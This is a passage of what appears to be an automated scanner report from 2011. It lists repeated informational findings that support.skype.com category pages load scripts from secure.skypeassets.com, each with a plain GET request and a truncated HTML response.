Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48664


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.424. https://support.skype.com/en-us/category/PAYSAFECARD/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/PAYSAFECARD/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/PAYSAFECARD/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:16 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48722


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.425. https://support.skype.com/en-us/category/PERSONALISE_SKYPE/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/PERSONALISE_SKYPE/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/PERSONALISE_SKYPE/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50589


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.426. https://support.skype.com/en-us/category/PREPAID_CARDS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/PREPAID_CARDS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/PREPAID_CARDS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:17 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 48252


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.427. https://support.skype.com/en-us/category/PRIVACY__SECURITY/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/PRIVACY__SECURITY/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/PRIVACY__SECURITY/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:31 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53348


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.428. https://support.skype.com/en-us/category/PSP/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/PSP/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/PSP/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52647


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.429. https://support.skype.com/en-us/category/PUBLIC_CHATS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/PUBLIC_CHATS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/PUBLIC_CHATS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:27 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50061


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.430. https://support.skype.com/en-us/category/SCREEN_SHARING/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SCREEN_SHARING/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SCREEN_SHARING/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:34:33 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 46643


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.431. https://support.skype.com/en-us/category/SC_CONFIG/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SC_CONFIG/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SC_CONFIG/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:12 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52986


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.432. https://support.skype.com/en-us/category/SC_GETTING_STARTED/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SC_GETTING_STARTED/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SC_GETTING_STARTED/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:10 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51199


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.433. https://support.skype.com/en-us/category/SC_PBX/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SC_PBX/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SC_PBX/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:14 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50744


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.434. https://support.skype.com/en-us/category/SC_REQUIREMENTS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SC_REQUIREMENTS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SC_REQUIREMENTS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:12 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50291


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.435. https://support.skype.com/en-us/category/SC_TROUBLE/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SC_TROUBLE/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SC_TROUBLE/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:20 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52078


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.436. https://support.skype.com/en-us/category/SEND_MONEY/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SEND_MONEY/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SEND_MONEY/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:30 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 50047


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.437. https://support.skype.com/en-us/category/SKYPEFIND/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPEFIND/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPEFIND/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52613


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.438. https://support.skype.com/en-us/category/SKYPE_2_8_MAC_OR_BELOW/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_2_8_MAC_OR_BELOW/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_2_8_MAC_OR_BELOW/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:26 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 51705


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.439. https://support.skype.com/en-us/category/SKYPE_4_2_OR_BELOW/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_4_2_OR_BELOW/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_4_2_OR_BELOW/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:24 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 56221


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.440. https://support.skype.com/en-us/category/SKYPE_ACCESS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_ACCESS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_ACCESS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53055


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.441. https://support.skype.com/en-us/category/SKYPE_API/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_API/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_API/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 54676


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.442. https://support.skype.com/en-us/category/SKYPE_CALLS_FROM_BROWSERS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_CALLS_FROM_BROWSERS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_CALLS_FROM_BROWSERS/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:21 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 52146


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.443. https://support.skype.com/en-us/category/SKYPE_FOR_ANDROID/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_FOR_ANDROID/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_FOR_ANDROID/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:33 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53344


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.444. https://support.skype.com/en-us/category/SKYPE_FOR_IPHONE/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_FOR_IPHONE/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_FOR_IPHONE/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:35:33 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 53132


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-support.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...

18.445. https://support.skype.com/en-us/category/SKYPE_FOR_LINUX/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.skype.com
Path:   /en-us/category/SKYPE_FOR_LINUX/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en-us/category/SKYPE_FOR_LINUX/ HTTP/1.1
Host: support.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:36:22 GMT
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 55439


<!DOCTYPE html>


<html lang="en-us" >

<head>

<title>Help for Skype ... user guides, FAQs, customer support</title>
   <meta name="description" content="Help using Skype - FAQs, us
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://secure.skypeassets.com//i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/wa-core.js" type='text/javascript' charset='utf-8'></script>
...[SNIP]...
</script>
<script src="https://secure.skypeassets.com/i/js/wanalytics/s_code.js" type='text/javascript' charset='utf-8'></script>
